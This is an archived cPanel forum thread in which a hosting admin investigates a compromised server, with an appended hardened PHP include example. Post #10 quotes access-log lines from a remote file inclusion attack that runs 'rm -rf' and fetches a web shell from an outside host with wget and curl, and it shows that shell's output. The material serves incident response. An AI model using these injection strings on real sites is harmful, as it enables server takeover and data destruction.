The Community Forums

Interact with an entire community of cPanel & WHM users!

possibly hacked ?

Discussion in 'General Discussion' started by ctbhost, Jul 30, 2005.

  1. ctbhost

    ctbhost Well-Known Member

    Joined:
    May 31, 2002
    Messages:
    139
    Likes Received:
    0
    Trophy Points:
    16
    In my /tmp directory there was a folder named /.x which contained the following files:

    failed.txt
    Norte11.txt
    Norte12.txt
    Norte13.txt
    Norte14.txt
    ocarteiro.htm
    ocarteiro.txt
    ok.txt

    The Nortel files contained lists of email addresses.

    What I was wondering is how could these files be placed on the server, and where, if anywhere in the logs, can I trace the source of the hacker?

    I have deleted the files and the folder from the server but really want to know what I can do to stop this happening again.

    About 6 months ago I secured my server using the information in this thread http://forums.cpanel.net/showthread.php?t=30159 and the instructions on http://eth0.us/

    Maybe there is something else I need to do.
     
  2. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
  3. ctbhost

    Thanks for that. I found a PHP script called .admin.php that allows the user to execute commands in the user's home directory.

    The only problem is the script was created the day before the logs start, so I can't seem to see how it was uploaded.
     
  4. ctbhost

    In my error_log I found a heap of lines like this.

    I have BFD and APF installed. Shouldn't BFD have blocked this IP address due to so many failed attempts in such a short time?

    [Sun Jul 31 03:28:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:28:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:28:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:28:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:28:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:28:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:28:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:28:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:57 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:57 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:30:00 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:30:08 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:30:09 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:30:09 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:30:09 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:30:09 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
     
  5. linux-image

    linux-image Well-Known Member

    Joined:
    Jun 8, 2004
    Messages:
    1,192
    Likes Received:
    1
    Trophy Points:
    38
    Location:
    India
    cPanel Access Level:
    Root Administrator
    BFD should have stopped that. As a quick heed,

    touch /home/avi/public_html/403.shtml

    as root in the shell. At least you will save the bandwidth.
     
  6. ctbhost

    Yeah, I understand what you're saying, but I'm more interested in why BFD didn't pick it up. Is there a way to check that BFD is working?
     
  7. linux-image

    Had it worked, you wouldn't have got so many accesses in the logs.

    In case you want to test, you will need to write a script that accesses a particular file, say 100 times in a loop, and see if BFD picks it up.

    Alternatively, I should say that mod_dosevasive is very effective at preventing DoS.
     
  8. ctbhost

    Seems that APF isn't working.

    I try to restart APF with apf -r

    and I get the error below. Any idea what this means?

    iptables v1.2.9: host/network `at' not found
    Try `iptables -h' or 'iptables --help' for more information.
    iptables v1.2.9: host/network `at' not found
    Try `iptables -h' or 'iptables --help' for more information.
     
  9. ctbhost

    Found the problem.
    In /etc/apf/deny_hosts.rules there was the blocked IP list and one entry called 'at'. I removed that and all is fixed.
     
  10. ctbhost

    I have figured out how the hacker is getting in, but how do I stop them?
    In the logs there are the following entries:

    GET /index.php?show=http://www.lolsys.org/cse.gif?&cmd=cd%20ice HTTP/1.1" 200 10076 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    GET /index.php?show=http://www.lolsys.org/cse.gif?&cmd=cd%20ice;pwd HTTP/1.1" 200 10112 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    GET /index.php?show=http://www.lolsys.org/cse.gif?&cmd=cd%20ice;rm%20-rf%20.index.php HTTP/1.1" 200 10076 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    GET /index.php?show=http://www.lolsys.org/cse.gif?&cmd=cd%20ice;wget%20www.lolsys.org/admin.txt HTTP/1.1" 200 10128 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    GET /index.php?show=http://www.lolsys.org/cse.gif?&cmd=cd%20ice;curl%20-o%20admin.txt%20www.lolsys.org/admin.txt HTTP/1.1" 200 10365 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    GET /index.php?show=http://www.lolsys.org/cse.gif?&cmd=cd%20ice;mv%20admin.txt%20.look.php HTTP/1.1" 200 10076 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    GET /ice/.look.php?password=aihdffa HTTP/1.1" 200 1116 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

    If I enter these in the browser after the domain name I get a page that has
    ------------------------------------------------------------------
    Sidewinder Command/Safemode Exploit 4.1


    System Information
    sysname: Linux
    nodename: [my host name]
    Release: 2.4.22-1.2199.nptl
    version: #1 Wed Aug 4 12:25:07 EDT 2004
    machine: i686

    Script Current User: USERNANME
    PHP Version: 5.0.4
    User Info: uid(32020) euid(32020) gid(522)
    Current Path: /home/user/public_html
    Server IP: xxx.xxx.xxx.xxx
    Web Server: Apache


    [*] Command Mode Run
    Command Stdout
    ------------------------------------------------------------

    Any idea how to protect against this type of attack?

    Would not allowing the string http:// in the "?show=" variable be enough, or is there a better way?
     
  11. chirpy

    You need to remove and then fix whatever that index.php script is. It's clearly exploitable.
     
  12. ctbhost

    Yeah, have found the problem. It was written when I was real new to PHP and open to exploit. I have put some extra scripting in to not allow various characters, which should stop them.

    Just got to work out why BFD isn't working.
     
    #12 ctbhost, Aug 9, 2005
    Last edited: Aug 9, 2005
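The question in post #10 (is blocking "http://" in ?show= enough?) and the character-filtering fix in post #12 are both blacklist approaches. The example below is added here and is not the thread's index.php; it assumes the original did roughly `include($_GET['show']);` and shows the allowlist pattern a practitioner would use instead, with hypothetical page names under a pages/ directory.

```php
<?php
// Added example, not the index.php from the thread. Assumes the original did roughly
//   include($_GET['show']);
// so ?show=http://... pulled a remote file into the script. Hardened version: map the
// parameter onto a fixed list of local files instead of filtering characters out of it.

// Allowlist of pages index.php may include (hypothetical file names).
function allowed_pages()
{
    return array(
        'home'    => 'pages/home.php',
        'about'   => 'pages/about.php',
        'contact' => 'pages/contact.php',
    );
}

// Resolve ?show= to a local file, or null if the value is not an exact allowlist key.
// URLs, "../", null bytes, stream wrappers and array parameters are all rejected the
// same way: there is no blacklist to get around, and the raw input never reaches
// the filesystem or the network.
function resolve_page($show)
{
    $pages = allowed_pages();
    if ($show === null || $show === '') {
        return $pages['home'];
    }
    if (!is_string($show) || !isset($pages[$show])) {
        return null;
    }
    return $pages[$show];
}

$show = isset($_GET['show']) ? $_GET['show'] : null;
$page = resolve_page($show);
if ($page === null) {
    header('HTTP/1.1 404 Not Found');
    // Log the rejected value hex-encoded so it shows up in error_log but stays inert.
    error_log('index.php: rejected show=' . bin2hex((string) $show));
    exit('Page not found');
}

// Defence in depth: confirm the resolved path really sits under ./pages before including.
$base = realpath(dirname(__FILE__) . '/pages');
$path = realpath(dirname(__FILE__) . '/' . $page);
if ($base === false || $path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
    header('HTTP/1.1 500 Internal Server Error');
    exit('Page misconfigured');
}
include $path;
```

On the PHP 5.0.4 build shown in post #10, `allow_url_fopen = Off` in php.ini disables http:// includes server-wide regardless of script code (later releases split that control out as `allow_url_include`), which is the setting-level backstop to the code fix.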